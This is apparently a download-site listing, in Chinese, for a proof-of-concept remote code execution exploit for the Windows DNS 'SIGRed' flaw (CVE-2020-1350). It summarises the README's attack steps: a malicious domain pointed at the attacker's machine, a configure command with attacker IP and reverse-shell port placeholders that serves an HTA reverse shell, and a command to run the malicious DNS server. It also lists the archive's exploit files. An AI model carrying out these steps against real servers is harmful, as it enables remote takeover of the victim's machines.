文件名称:SIGRed_RCE_PoC
文件大小:283KB
文件格式:ZIP
更新时间:2024-03-23 12:14:33
Python
适用于CVE-2020-1350,SigRed的PoC远程代码执行漏洞利用。 创建人: 仅用于研究目的。 使用风险自负。 利用写作 有关使用的方法的详细信息在这里: 实验室环境设置 攻击者将建立一个邪恶域,其NS记录指向恶意服务器(攻击者计算机)。 出于演示/测试目的,只需在受害者计算机上设置条件转发器即可将“恶意域”请求转发到攻击者计算机。 工具-> DNS 在Linux攻击者机器上:(我使用了基本的Ubuntu 20.04.1 VM) sudo python3 configure.py -ip IP_ATTACKER -p PORT_REVERSE_SHELL -hp PORT_APACHE_SERVER (default 80) 这会将受害者配置为下载反向HTA Shell的Apache服务器。 运行漏洞利用 sudo python3 evildns.py 需要su
【文件预览】:
SIGRed_RCE_PoC-main
----offsets.py(5KB)
----configure.py(1KB)
----reverse_shell()
--------shell.hta(5KB)
--------server.py(2KB)
----exploit.py(8KB)
----images()
--------forward.png(158KB)
--------ch0mpie.png(195KB)
----sigred_grapl_rule()
--------main.py(1KB)
----README.md(3KB)
----.gitignore(2KB)
----evildns.py(27KB)